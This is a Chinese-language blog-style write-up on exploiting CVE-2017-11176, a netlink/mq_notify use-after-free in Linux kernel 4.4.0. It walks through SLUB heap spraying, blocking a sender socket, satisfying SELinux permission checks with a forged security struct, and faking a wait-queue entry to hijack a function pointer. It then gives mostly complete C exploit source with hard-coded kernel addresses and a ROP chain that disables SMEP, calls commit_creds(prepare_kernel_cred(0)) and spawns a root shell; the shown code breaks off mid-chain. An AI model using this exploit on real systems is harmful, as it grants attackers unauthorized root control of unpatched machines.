前言
之前在网上看到有翻译成中文的此漏洞英文分析文章,可惜就翻译了前两篇。并且在我实践时,发现原本的英文文章也有不小的问题,它使用内核版本也比较旧,所以我换了一个现在还算常用的内核版本线,尝试写出特定的exp,也希望和大家一起交流。此文谨学习交流,切勿进行违法行为。
linux内核中的双向链表
Linux内核驱动开发会经常用到Linux内核中经典的双向链表list_head,以及它的拓展接口和宏定义:list_add
、list_add_tail
、list_del
、list_for_each_entry
等。
struct list_head {
struct list_head *next, *prev;
};
开始创建一个链表头head_task,并使用LIST_HEAD(head_task)
进行初始化,如下所示:
创建完成后,然后创建第一个节点,再通过使用list_add
接口将这个first_task节点插入到head_task之后:
以此类推,每次插入一个新的节点,都是紧靠着head_task节点的,而之前插入的节点以此排序靠后,所以最后的哪个节点是第一个插入head_task的哪个节点,所以结论是:先来的节点靠后,而后来的节点靠前,也就是先进后出,后进先出,类似于栈。
上图有个问题,就是prev的指针指向的前者的next对象,而不是橙色的头部指针操作都限制于list里。
更多的就希望读者自己学习了。
slab内存分配
在SLUB分配器下,slab
的管理主要由struct kmem_cache
完成。kmalloc
可以分配的内存块大小从 8 开始,以 2 的指数上涨,一直到页大小,注意其中 96、192 两块优化后增加的内存大小,每个块都有自己的struct kmem_cache
。
简单来说,每个 CPU 都拥有一个struct kmem_cache_cpu
,它拥有page
和partial
两个成员。
page
管理着此 CPU 首先分配的内存,其中空闲slab
会被freelist
管理,如果slab
占满,就会把整个Page放入full slabs
里系统统一管理,同时partial
会拿出一份Page交给page
管理。
如果partial
中的Page里被使用slab
低于一定阀值,就会把此Page放入struct kmem_cache_node
管理的超大nr of slabs
里。在其中的Page里被使用slab
又低于一定阀值,将会被系统自动释放其中正在使用的slab
。
当然,某一 CPU 的内存块用尽后,会从nr of slabs
里抓取放入partial
成员中,如果还不够,就需要伙伴系统来再分配新的大块内存页。
构造提权利用
根据上面构造poc的过程,已经知道内存崩溃在什么地方,接下来就需要去控制此块内存的内容。
指定单一CPU
首先,根据SLUB
分配原则,不同 CPU 拥有不同内存块,所以我们需要在一开始就固定住特定的 CPU 去运行程序,增加控制到该块内存的几率。
void migrate_to_cpu0() {
cpu_set_t set;
CPU_ZERO(&set); //初始化为0
CPU_SET(0,&set); //设置CPU指定为0号
//绑定当前进程到指定的CPU上
if (sched_setaffinity(_getpid(), sizeof(set), &set) == -1){
perror("sched_setaffinity wrong");
exit(-1);
}
}
选择堆喷射的工具
其次,被控制的内存块是struct sock
,也因为被nlk()
函数改造成struct netlink_sock
,而最后需要利用的指针函数也在struct netlink_sock
里,所以应该查看struct netlink_sock
的结构体大小。这里使用pahole
工具。
struct netlink_sock
总大小是 1000 字节,而即使是struct sock
大小也有 704 ,超过了 512 字节,都在 1024 字节的slab
中。所以需要一个可以提供 1024 字节大小,并且内容可以自己填写的相对稳定slab
。
之后发现,在sendmsg()
函数把数据送入内核后,内核___sys_sendmsg()函数
会短暂的出现一个长度和内容都可以自己控制的辅助块(除了头 16 个字节不可控),不过它在函数结束前就会释放,所以在其中就要将运行它的进程阻塞。
static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
struct msghdr *msg_sys, unsigned int flags,
struct used_address *used_address,
unsigned int allowed_msghdr_flags)
{
struct compat_msghdr __user *msg_compat =
(struct compat_msghdr __user *)msg;
struct sockaddr_storage address;
struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
//cmsghdr的大小为 16,ctl总共为 36
unsigned char ctl[sizeof(struct cmsghdr) + 20]
__aligned(sizeof(__kernel_size_t));
/* 20 is size of ipv6_pktinfo */
[...]
//msg_sys和msg实为同一内容不同内存
if (MSG_CMSG_COMPAT & flags)
err = get_compat_msghdr(msg_sys, msg_compat, NULL, &iov);
else
err = copy_msghdr_from_user(msg_sys, msg, NULL, &iov);
[...]
//用户提供的msg_controllen的大小要小于等于INT_MAX
if (msg_sys->msg_controllen > INT_MAX)
goto out_freeiov;
//allowed_msghdr_flags为0,flags即为flags
flags |= (msg_sys->msg_flags & allowed_msghdr_flags);
//ctl_len值就等于用户提供的msg_controllen
ctl_len = msg_sys->msg_controllen;
//MSG_CMSG_COMPAT值经查询为0x80000000,flags一般设置为0即可进入else if判断
if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
[...]
} else if (ctl_len) {
BUILD_BUG_ON(sizeof(struct cmsghdr) !=
CMSG_ALIGN(sizeof(struct cmsghdr)));
//辅助块struct cmsghdr一般只有16字节,只有有更多data时会扩充
if (ctl_len > sizeof(ctl)) {
//创建辅助块的ctl_len可以由用户态控制,同时注意sock_kmalloc()函数限制
ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
if (ctl_buf == NULL)
goto out_freeiov;
}
err = -EFAULT;
/*
* Careful! Before this, msg_sys->msg_control contains a user pointer.
* Afterwards, it will be a kernel pointer. Thus the compiler-assisted
* checking falls down on this.
*/
//把ctl_buf中的内容由用户态的msg_control提供,msg_control即是辅助块struct cmsghdr
if (copy_from_user(ctl_buf,
(void __user __force *)msg_sys->msg_control,
ctl_len))
goto out_freectl;
msg_sys->msg_control = ctl_buf;
}
msg_sys->msg_flags = flags;
[...]
err = sock_sendmsg(sock, msg_sys);
[...]
out_freectl:
//只要辅助块写入过用户态传入的值,说明申请过内存块,需要对其释放,所以辅助块生命周期很短
if (ctl_buf != ctl)
sock_kfree_s(sock->sk, ctl_buf, ctl_len);
out_freeiov:
kfree(iov);
return err;
}
//表面上cmsghdr只有一点点成员,实际你可以在其后创建一块data
struct cmsghdr {
__kernel_size_t cmsg_len; /* 0 8 */
int cmsg_level; /* 8 4 */
int cmsg_type; /* 12 4 */
/* size: 16, cachelines: 1, members: 3 */
/* last cacheline: 16 bytes */
};
在申请内存而调用的函数是sock_kmalloc()函数,申请时有个关于系统自身属性optmem_max
的限制,可以通过以下命令查看系统的optmem_max
:
cat /proc/sys/net/core/optmem_max
只有其大于 512 时才可以继续这条提权之路
void *sock_kmalloc(struct sock *sk, int size, gfp_t priority)
{
//这块申请内存大小和避免race而总共申请都要小于optmem_max,所以最后喷射的堆也不能很多
if ((unsigned int)size <= sysctl_optmem_max &&
atomic_read(&sk->sk_omem_alloc) + size < sysctl_optmem_max) {
void *mem;
/* First do the add, to avoid the race if kmalloc
* might sleep.
*/
atomic_add(size, &sk->sk_omem_alloc);
//创建内存块
mem = kmalloc(size, priority);
if (mem)
return mem;
atomic_sub(size, &sk->sk_omem_alloc);
}
return NULL;
}
阻塞发送端进程
接下来,为了去阻塞该进程,需要两点:
- 选择一个合适的
socket
协议,既不会抢占 1024 字节,也不会触碰 UAF 的内存块,即选择AF_UNIX
- 寻找函数来设置
timeo
的值,使进程产生阻塞,并且阻塞时间尽可能大,即仍然为setsockopt()
函数
不用原来的netlink
套接字流程,主要因为其中netlink_getsockbypid()函数,它会遍历nl_table
里成员,可能会对 UAF 内存块产生致命影响。
static struct sock *netlink_getsockbyportid(struct sock *ssk, u32 portid)
{
struct sock *sock;
struct netlink_sock *nlk;
//此处会查找连接的recv_fd
sock = netlink_lookup(sock_net(ssk), ssk->sk_protocol, portid);
if (!sock)
return ERR_PTR(-ECONNREFUSED);
/* Don't bother queuing skb if kernel socket has no input function */
nlk = nlk_sk(sock);
if (sock->sk_state == NETLINK_CONNECTED &&
nlk->dst_portid != nlk_sk(ssk)->portid) {
sock_put(sock);
return ERR_PTR(-ECONNREFUSED);
}
return sock;
}
static struct sock *netlink_lookup(struct net *net, int protocol, u32 portid)
{
struct netlink_table *table = &nl_table[protocol];
struct sock *sk;
rcu_read_lock();
//到对应协议的hash表单中寻找
sk = __netlink_lookup(table, portid, net);
if (sk)
sock_hold(sk);
rcu_read_unlock();
return sk;
}
那么,在AF_UNIX
协议中一般使用struct sockaddr_un
,它仅包含成员sun_family
和sun_path
,很独特的是它的端口是类似于文件路径,使它更像是共享内存模式,将sun_path
头字节置为 0 ,就不会有寻找不到路径的麻烦。
//该协议在sendmsg下进入的是此函数
static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
size_t len)
{
struct sock *sk = sock->sk;
struct net *net = sock_net(sk);
struct unix_sock *u = unix_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_un *, sunaddr, msg->msg_name);
struct sock *other = NULL;
int namelen = 0; /* fake GCC */
int err;
unsigned int hash;
struct sk_buff *skb;
long timeo;
struct scm_cookie scm;
int max_level;
int data_len = 0;
int sk_locked;
wait_for_unix_gc();
//需要绕过此函数的判断条件
err = scm_send(sock, msg, &scm, false);
if (err < 0)
return err;
err = -EOPNOTSUPP;
if (msg->msg_flags&MSG_OOB)
goto out;
if (msg->msg_namelen) {
err = unix_mkname(sunaddr, msg->msg_namelen, &hash);
if (err < 0)
goto out;
namelen = err;
} else {
sunaddr = NULL;
err = -ENOTCONN;
other = unix_peer_get(sk);
if (!other)
goto out;
}
if (test_bit(SOCK_PASSCRED, &sock->flags) && !u->addr
&& (err = unix_autobind(sock)) != 0)
goto out;
err = -EMSGSIZE;
if (len > sk->sk_sndbuf - 32)
goto out;
if (len > SKB_MAX_ALLOC) {
data_len = min_t(size_t,
len - SKB_MAX_ALLOC,
MAX_SKB_FRAGS * PAGE_SIZE);
data_len = PAGE_ALIGN(data_len);
BUILD_BUG_ON(SKB_MAX_ALLOC < PAGE_SIZE);
}
//最终阻塞和判断都在此函数中
skb = sock_alloc_send_pskb(sk, len - data_len, data_len,
msg->msg_flags & MSG_DONTWAIT, &err,
PAGE_ALLOC_COSTLY_ORDER);
[...]
}
static __inline__ int scm_send(struct socket *sock, struct msghdr *msg,
struct scm_cookie *scm, bool forcecreds)
{
[...]
//这次由于msg_controllen必须不能为零,就需要去__scm_send()函数中接受检查
if (msg->msg_controllen <= 0)
return 0;
//跳转至此判断函数
return __scm_send(sock, msg, scm);
}
int __scm_send(struct socket *sock, struct msghdr *msg, struct scm_cookie *p)
{
struct cmsghdr *cmsg;
int err;
//只进入一次,第二次因为没有就直接跳出
for_each_cmsghdr(cmsg, msg) {
err = -EINVAL;
/* Verify that cmsg_len is at least sizeof(struct cmsghdr) */
/* The first check was omitted in <= 2.2.5. The reasoning was
that parser checks cmsg_len in any case, so that
additional check would be work duplication.
But if cmsg_level is not SOL_SOCKET, we do not check
for too short ancillary data object at all! Oops.
OK, let's add it...
*/
//长度检查,cmsg_len要大于等于16,又要小于等于整体辅助块的大小
if (!CMSG_OK(msg, cmsg))
goto error;
//cmsg_level需要不等于SOL_SOCKET,即不等于0xffff的某一取值
if (cmsg->cmsg_level != SOL_SOCKET)
continue;
[...]
}
[...]
return 0;
error:
scm_destroy(p);
return err;
}
//cmsg_len要大于等于16,又要小于等于整体辅助块的大小
#define CMSG_OK(mhdr, cmsg) ((cmsg)->cmsg_len >= sizeof(struct cmsghdr) &&
(cmsg)->cmsg_len <= (unsigned long)
((mhdr)->msg_controllen -
((char *)(cmsg) - (char *)(mhdr)->msg_control)))
#define for_each_cmsghdr(cmsg, msg)
然后,它能阻塞的地方也很特别,在于sock_alloc_send_pskb()
函数里,和在上文的netlink_attachskb()
函数中不一样,它检验的是接收端的sk_rcvbuf
,而此处它检验的是发送端的sk_sndbuf
,最后也由skb_set_owner_w()
函数来增加数据块大小,来达到阻塞的前提条件。从这点来看,虽然是不同函数,但内核逻辑思路还是统一的。
struct sk_buff *sock_alloc_send_pskb(struct sock *sk, unsigned long header_len,
unsigned long data_len, int noblock,
int *errcode, int max_page_order)
{
struct sk_buff *skb;
long timeo;
int err;
//timeo从这里赋值,如果sk->sndtimeo不为零即会得到阻塞时间值
timeo = sock_sndtimeo(sk, noblock);
for (;;) {
err = sock_error(sk);
if (err != 0)
goto failure;
err = -EPIPE;
if (sk->sk_shutdown & SEND_SHUTDOWN)
goto failure;
//@sk_sndbuf: size of send buffer in bytes
//如果得到数据块大小小于sk_sndbuf,仍然无法阻塞
if (sk_wmem_alloc_get(sk) < sk->sk_sndbuf)
break;
sk_set_bit(SOCKWQ_ASYNC_NOSPACE, sk);
set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
err = -EAGAIN;
if (!timeo)
goto failure;
if (signal_pending(current))
goto interrupted;
//到达此处后,阻塞开始
timeo = sock_wait_for_wmem(sk, timeo);
}
skb = alloc_skb_with_frags(header_len, data_len, max_page_order,
errcode, sk->sk_allocation);
if (skb)
skb_set_owner_w(skb, sk);
return skb;
interrupted:
err = sock_intr_errno(timeo);
failure:
*errcode = err;
return NULL;
}
刚刚已经得知了unix_dgram_sendmsg()
函数如何走到阻塞的代码路径,现在剩下的问题是,如何设置timeo
的值,因为一般sk->sndtimeo
的值都为 0,这里将继续使用setsockopt()
函数来设置。上文已经讲过了该函数的主要绕过点,这里关注对应参数下的特殊检验点。
//level选择是 SOL_SOCKET 值
int sock_setsockopt(struct socket *sock, int level, int optname,
char __user *optval, unsigned int optlen)
{
struct sock *sk = sock->sk;
int val;
int valbool;
struct linger ling;
int ret = 0;
/*
* Options without arguments
*/
if (optname == SO_BINDTODEVICE)
return sock_setbindtodevice(sk, optval, optlen);
if (optlen < sizeof(int))
return -EINVAL;
if (get_user(val, (int __user *)optval))
return -EFAULT;
//以上有很多检测点,但上文已经分析,就不再累述
valbool = val ? 1 : 0;
lock_sock(sk);
switch (optname) {
[...]
//当 optname 为 SO_SNDTIMEO 时,可以修改timeo,继续跟踪
case SO_SNDTIMEO:
ret = sock_set_timeout(&sk->sk_sndtimeo, optval, optlen);
break;
[...]
default:
ret = -ENOPROTOOPT;
break;
}
release_sock(sk);
return ret;
}
//其中的检查有点绕,但有简单办法就是结构体全置零,即可绕过
static int sock_set_timeout(long *timeo_p, char __user *optval, int optlen)
{
struct timeval tv;
//optlen不能小于struct timeval结构体大小
if (optlen < sizeof(tv))
return -EINVAL;
//用户态的struct timeval需要真实存在
if (copy_from_user(&tv, optval, sizeof(tv)))
return -EFAULT;
//tv.tv_usec需要大于等于0 ,又要小于USEC_PER_SEC
if (tv.tv_usec < 0 || tv.tv_usec >= USEC_PER_SEC)
return -EDOM;
//tv.tv_sec需要大于等于零
if (tv.tv_sec < 0) {
static int warned __read_mostly;
*timeo_p = 0;
if (warned < 10 && net_ratelimit()) {
warned++;
pr_info("%s: `%s' (pid %d) tries to set negative timeoutn",
__func__, current->comm, task_pid_nr(current));
}
return 0;
}
//timeo_p成功赋予最大时延
*timeo_p = MAX_SCHEDULE_TIMEOUT;
//俩者皆为0时,直接退出
if (tv.tv_sec == 0 && tv.tv_usec == 0)
return 0;
if (tv.tv_sec < (MAX_SCHEDULE_TIMEOUT/HZ - 1))
*timeo_p = tv.tv_sec * HZ + DIV_ROUND_UP(tv.tv_usec, USEC_PER_SEC / HZ);
return 0;
}
查阅网上资料,都介绍到这一步就算完成此模块,但我在真正调试时,发现还有保护需要绕过,网上版本比我低,所以或许没有此保护。
不过这也不是问题,找到对应函数,再一一绕过检验。
SYSCALL_DEFINE5(setsockopt, int, fd, int, level, int, optname,
char __user *, optval, int, optlen)
{
int err, fput_needed;
struct socket *sock;
if (optlen < 0)
return -EINVAL;
sock = sockfd_lookup_light(fd, &err, &fput_needed);
if (sock != NULL) {
//此处是个struct socket的安全检查函数
err = security_socket_setsockopt(sock, level, optname);
if (err)
goto out_put;
if (level == SOL_SOCKET)
err =
sock_setsockopt(sock, level, optname, optval,
optlen);
else
err =
sock->ops->setsockopt(sock, level, optname, optval,
optlen);
out_put:
fput_light(sock->file, fput_needed);
}
return err;
}
//这里是个内核hook函数,可以拿gdb跟踪下一步
int security_socket_setsockopt(struct socket *sock, int level, int optname)
{
return call_int_hook(socket_setsockopt, 0, sock, level, optname);
}
//gdb跟踪到此处,其中主要有sock_has_perm()函数检查校验
static int selinux_socket_setsockopt(struct socket *sock, int level, int optname)
{
int err;
//err为 0 即可绕过
err = sock_has_perm(sock->sk, SOCKET__SETOPT);
if (err)
return err;
return selinux_netlbl_socket_setsockopt(sock, level, optname);
}
//主要检查了struct sock里的sk->sk_security值来判断安全
static int sock_has_perm(struct sock *sk, u32 perms)
{
struct sk_security_struct *sksec = sk->sk_security;
struct common_audit_data ad;
struct lsm_network_audit net = {0,};
//SECINITSID_KERNEL值为 1 ,所以sksec->sid值必须为 1
if (sksec->sid == SECINITSID_KERNEL)
return 0;
ad.type = LSM_AUDIT_DATA_NET;
ad.u.net = &net;
ad.u.net->sk = sk;
return avc_has_perm(current_sid(), sksec->sid, sksec->sclass, perms,
&ad);
}
//由于无法找到其头文件,需要在利用代码中,构造对应结构体并且传值,其中用不到的结构体指针可以拿 void * 代替
struct sk_security_struct {
#ifdef CONFIG_NETLABEL
enum { /* NetLabel state */
NLBL_UNSET = 0,
NLBL_REQUIRE,
NLBL_LABELED,
NLBL_REQSKB,
NLBL_CONNLABELED,
} nlbl_state;
struct netlbl_lsm_secattr *nlbl_secattr; /* NetLabel sec attributes */
#endif
u32 sid; /* SID of this object */
u32 peer_sid; /* SID of peer */
u16 sclass; /* sock security class */
};
//只要sksec->nlbl_state为 0,即可通过此函数判断。
int selinux_netlbl_socket_setsockopt(struct socket *sock,
int level,
int optname)
{
int rc = 0;
struct sock *sk = sock->sk;
struct sk_security_struct *sksec = sk->sk_security;
struct netlbl_lsm_secattr secattr;
if (selinux_netlbl_option(level, optname) &&
(sksec->nlbl_state == NLBL_LABELED ||
sksec->nlbl_state == NLBL_CONNLABELED)) {
netlbl_secattr_init(&secattr);
lock_sock(sk);
/* call the netlabel function directly as we want to see the
* on-the-wire label that is assigned via the socket's options
* and not the cached netlabel/lsm attributes */
rc = netlbl_sock_getattr(sk, &secattr);
release_sock(sk);
if (rc == 0)
rc = -EACCES;
else if (rc == -ENOMSG)
rc = 0;
netlbl_secattr_destroy(&secattr);
}
return rc;
}
伪造等待队列
查看struct netlink_sock
结构体,在非sock
的延伸段,拥有wait_queue_head_t wait
的等待队列的成员,它可以决定对应task
是否加入等待队列和如何被唤醒的行为,上文也有简单表述。
exp需要有个可控的函数指针,正好在等待队列里有个func
成员函数指针,上面也提到唤醒流程就是通过它进行,而在填充原本的struct sock
内存块时,在对应位置伪造虚假的wait_queue_t
结构,而在用户空间的wait_queue_t
结构里填充虚假的func
成员,最后进行唤醒这个伪造的等待队列节点。
struct netlink_sock {
/* struct sock has to be the first member of netlink_sock */
struct sock sk;
u32 portid;
u32 dst_portid;
u32 dst_group;
u32 flags;
u32 subscriptions;
u32 ngroups;
unsigned long *groups;
unsigned long state;
size_t max_recvmsg_len;
wait_queue_head_t wait;
bool bound;
bool cb_running;
struct netlink_callback cb;
struct mutex *cb_mutex;
struct mutex cb_def_mutex;
void (*netlink_rcv)(struct sk_buff *skb);
int (*netlink_bind)(struct net *net, int group);
void (*netlink_unbind)(struct net *net, int group);
struct module *module;
struct rhash_head node;
struct rcu_head rcu;
struct work_struct work;
};
//使用list_head创建的双向链表
struct __wait_queue_head {
spinlock_t lock;
struct list_head task_list;
};
typedef struct __wait_queue_head wait_queue_head_t;
在文章前面已经讲解了list_head
的构造和list_add
函数的添加过程。在等待队列唤醒时通过list_for_each_entry_safe()
函数寻找,所以头部和节点的struct list_head
都要精心构造。
typedef struct __wait_queue wait_queue_t;
struct __wait_queue {
unsigned int flags;
void *private;
//需要可控的函数指针
wait_queue_func_t func;
struct list_head task_list;
};
static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
int nr_exclusive, int wake_flags, void *key)
{
wait_queue_t *curr, *next;
list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
unsigned flags = curr->flags;
if (curr->func(curr, mode, wake_flags, key) &&
//节点flags需要等于WQ_FLAG_EXCLUSIVE,即1,并且没有其它task要唤醒
(flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
break;
}
}
制造ROP链
刚刚仅仅控制了一个函数指针,远远不能够去控制栈来写rop链,这里有个小tip,当然很多文章都讲到过,交换esp和eXx(某个寄存器)的值,把栈迁移至eXx的值上,好处在于交换后的rsp值只有低32位,明显就落于用户空间,那就只要绕过了smap保护,就可以自己来控制。在此之前还有一步,就是去确定到底是哪个eXx可以被控制。
在用户空间构造的struct wait_queue_t
,我用0xac来初始化,最后执行到curr->func(curr, mode, wake_flags, key)
时,可以清晰的看到寄存器RAX就是自己构造的struct wait_queue_t
,只要取该地址值的低32位就是对应的栈开始地址。
之后,可以用ROPgadget来获取gadget了,最好是一次性把gadget都写到一个文件中
ROPgadget --binary vmlinux > gadget
接着,构造rop链,与用户态构造不同的是,现在运行于内核态(ring0),在 commit_creds(prepare_kernel_cred(0))
后,想要在用户态上运行程序,必须回退操作。这里结合交换GS的swapgs
指令和返回中断原处iretq
指令,可以将程序从ring0转换到ring3中,最后需要注意的是,在swapgs
指令之后的pop rbp
需要填写一个可读的用户态地址,不然程序可能会换页错误。
pop rdi; ret |
---|
NULL |
——————————— |
addr of |
prepare_kernel_cred() |
——————————— |
pop rdx; ret |
——————————— |
addr of |
commit_creds() |
——————————— |
mov rdi, rax ; |
call rdx |
——————————— |
swapgs; |
pop rbp; ret |
——————————— |
有效的用户态地址 |
iretq; |
——————————— |
system(“/bin/sh”) |
——————————— |
CS |
——————————— |
EFLAGS |
——————————— |
RSP |
——————————— |
SS |
——————————— |
在这里出现了一个问题,我拿ropgadget去获取iretq
的一个gadget时,虽然得到了一个,但是exp跑不出来,使用gdb调试时发现真实的地址值里存在的指令不正确,可能是运行时地址发生了变化。
所以,我先用pwntools工具查找到汇编指令在对应环境下的16进制编码。
接着在ida pro里查询对应的编码,因为是小字端,所以把指令倒过来填写搜索。
最后,在其中找到一个运行时也不会改变的地址,去进行rop链攻击,成功。
(最后exp删去一处结构,补上即可运行)
//gcc -O0 -pthread exploit-2017-11176.c
//linux 4.4.0
//commit afd2ff9b7e1b367172f18ba7f693dfb62bdcb2dc
#define _GNU_SOURCE
#include <stdio.h>
#include <mqueue.h>
#include <asm/types.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/netlink.h>
#include <pthread.h>
#include <errno.h>
#include <sys/mman.h>
#include <stdbool.h>
#include <sys/ioctl.h>
#include <sys/un.h>
#include <asm/types.h>
#include <sched.h>
#define SOL_NETLINK 270
#define NOTIFY_COOKIE_LEN 32
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)
#define _setsockopt(fd, level, optname, optval, optlen) syscall(__NR_setsockopt, fd, level, optname, optval, optlen)
#define _dup(fd) syscall(__NR_dup, fd)
#define _close(fd) syscall(__NR_close, fd)
#define _bind(recv_fd, addr, len) syscall(__NR_bind, recv_fd, addr, len)
#define _sendmsg(sockfd, msg, flags) syscall(__NR_sendmsg, sockfd, msg ,flags)
#define _connect(sockfd, addr, addrlen) syscall(__NR_connect, sockfd, addr, addrlen)
#define _getpid() syscall(__NR_getpid)
#define _sched_setaffinity(pid, cpusetsize, mask) syscall(__NR_sched_setaffinity, pid, cpusetsize, mask)
typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)0xffffffff81074380;
_commit_creds commit_creds = (_commit_creds)0xffffffff81073ff0;
void get_root() {
commit_creds(prepare_kernel_cred(0));
}
size_t user_cs, user_ss, user_rflags, user_sp;
struct unblock_thread_arg {
int fd;
int unblock_fd;
bool ok;
};
void migrate_to_cpu0() {
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0,&set);
if (_sched_setaffinity(_getpid(), sizeof(set), &set) == -1){
perror("sched_setaffinity wrong");
exit(-1);
}
}
int prepare(){
char iov_base[1024];
int send_fd = -1;
int recv_fd = -1;
int least_size = 0;
struct iovec iov;
iov.iov_base = iov_base;
iov.iov_len = sizeof(iov_base);
struct sockaddr_nl addr;
addr.nl_family = AF_NETLINK;
addr.nl_pid = 11;
addr.nl_groups = 0;
addr.nl_pad = 0;
struct msghdr msg;
msg.msg_name = &addr;
msg.msg_namelen = sizeof(addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = NULL;
msg.msg_controllen = 0;
msg.msg_flags = 0;
puts("Start poc");
if ((send_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) < 0 || (recv_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) < 0){
perror("socket wrong");
exit(-1);
}
printf("send_fd:%d, recv_fd:%dn", send_fd, recv_fd);
while(_bind(recv_fd, (struct sockaddr*)&addr, sizeof(addr))){
perror("bind pid");
addr.nl_pid++;
}
if (_connect(send_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("connect wrong");
exit(-1);
}
printf("netlink socket (nl_pid=%d)n",addr.nl_pid);
if (_setsockopt(recv_fd, SOL_SOCKET, SO_RCVBUF, &least_size, sizeof(least_size)) < 0)
perror("setsockopt wrong");
puts("REVBUF reduced");
while (_sendmsg(send_fd, &msg, MSG_DONTWAIT) > 0);
if (errno != EAGAIN){
perror("sendmsg wrong");
exit(-1);
}
puts("Flooding full");
_close(send_fd);
return recv_fd;
}
static void *unblock_thread(void *arg)
{
int optlen = sizeof(int);
int optval = 0x1000;
struct unblock_thread_arg *para = (struct unblock_thread_arg *) arg;
para->ok = true;
sleep(3);
printf("close sock_fd:%dn",para->fd);
_close(para->fd);
puts("start to unblock");
if (_setsockopt(para->unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &optval, optlen) < 0) {
perror("setsockopt wrong");
exit(-1);
}
puts("unblocked");
return NULL;
}
static int vuln(int fd,int unblock_fd)
{
struct unblock_thread_arg arg;
struct sigevent sigv;
pthread_t tid;
char user_buf[NOTIFY_COOKIE_LEN];
memset(&arg,0,sizeof(arg));
arg.ok = false;
arg.fd = fd;
arg.unblock_fd = unblock_fd;
if (pthread_create(&tid,NULL,unblock_thread,&arg) < 0)
{
perror("unblock thread create wrong");
exit(-1);
}
while(arg.ok == false);
printf("sock_fd:%d, unblock_fd:%dn", fd, unblock_fd);
memset(&sigv,0,sizeof(sigv));
sigv.sigev_signo = fd;
sigv.sigev_notify = SIGEV_THREAD;
sigv.sigev_value.sival_ptr = user_buf;
_mq_notify((mqd_t)-1,&sigv);
}
typedef int (*wait_queue_func_t)(void *wait, unsigned mode, int flags, void *key);
struct wait_queue_t
{
unsigned int flag;
void *private;
wait_queue_func_t func;
struct list_head task_list;
};
struct sk_security_struct {
enum { /* NetLabel state */
NLBL_UNSET = 0,
NLBL_REQUIRE,
NLBL_LABELED,
NLBL_REQSKB,
NLBL_CONNLABELED,
} nlbl_state;
void *nlbl_secattr; /* NetLabel sec attributes */
__u32 sid; /* SID of this object */
__u32 peer_sid; /* SID of peer */
__u16 sclass; /* sock security class */
};
void get_shell() {
system("/bin/sh");
}
struct spray_thread_arg
{
pthread_t tid;
int send_fd;
struct msghdr *msg;
int flag;
};
static void *heap_spray(void *arg)
{
struct spray_thread_arg *para = (struct spray_thread_arg *) arg;
puts("heap spray");
_sendmsg(para->send_fd, para->msg, para->flag);
puts("not block");
return NULL;
}
void exploit() {
int send_fd = -1;
int recv_fd = -1;
puts("Start exploit");
if ((send_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0 || (recv_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0){
perror("heap socket wrong");
exit(-1);
}
printf("heap: send_fd:%d, recv_fd:%dn", send_fd, recv_fd);
struct sockaddr_un ser;
ser.sun_family = AF_UNIX;
strcpy(ser.sun_path,"@addr");
ser.sun_path[0] = 0;
if (_bind(recv_fd, (struct sockaddr *)&ser, sizeof(ser)) < 0) {
perror("heap bind wrong");
exit(-1);
}
if (_connect(send_fd, (struct sockaddr *)&ser, sizeof(ser)) < 0) {
perror("heap connect wrong");
exit(-1);
}
puts("layout");
char buf[1024];
memset(buf, 0, sizeof(buf));
struct cmsghdr *pbuf;
pbuf = (struct cmsghdr *)buf;
pbuf->cmsg_len = sizeof(buf);
pbuf->cmsg_level = 0;
pbuf->cmsg_type = 1;
struct sk_security_struct secur;
memset(&secur, 0, sizeof(secur));
secur.sid = 1;
*(size_t *)((size_t)buf + 0x278) = (size_t)(&(secur));
struct wait_queue_t uwq;
memset(&uwq, 0xac, sizeof(uwq));
uwq.flag = 0x01;
uwq.func = (void *)0xffffffff8100008a; //xchg eax, esp ; ret
uwq.task_list.prev = (void *)&(uwq.task_list.next);
uwq.task_list.next = (void *)&(uwq.task_list.next);
printf("buf: %p, uwq: %pn", buf, &(uwq.task_list.next));
*(unsigned long *)((size_t)buf + 0x2f8) = (size_t)(&(uwq.task_list.next));//netlink_sock->wait->next
*(unsigned long *)((size_t)buf + 0x300) = (size_t)(&(uwq.task_list.next));//netlink_sock->wait->prev
struct iovec iov;
char iovbuf[10];
iov.iov_base = iovbuf;
iov.iov_len = sizeof(iovbuf);
struct msghdr msg;
memset(&msg, 0, sizeof(msg));
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
puts("distribute");
size_t *p = (size_t *)(((size_t)&uwq) & 0xffffffff);
printf("wait_queue_t: 0x%lxn",(size_t)&p);
mmap(p, 0x2000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
user_sp = (size_t)p;
size_t rop[30] = {0};
int r = 0;
rop[r++] = 0xffffffff8131e2ef; //pop rdi ; ret
rop[r++] = 0x6f0;
rop[r++] = 0xffffffff810464d4; //mov cr4, rdi ; pop rbp ; ret
rop[r++] = 0x0;
rop[r++] = (size_t)get_root;
rop[r++] = 0xffffffff810465b4; //swapgs ; pop rbp ; ret
rop[r++] = user_sp;
rop[r++] = 0xffffffff81034740; //iretq ;
rop[r++] = (size_t)get_shell;
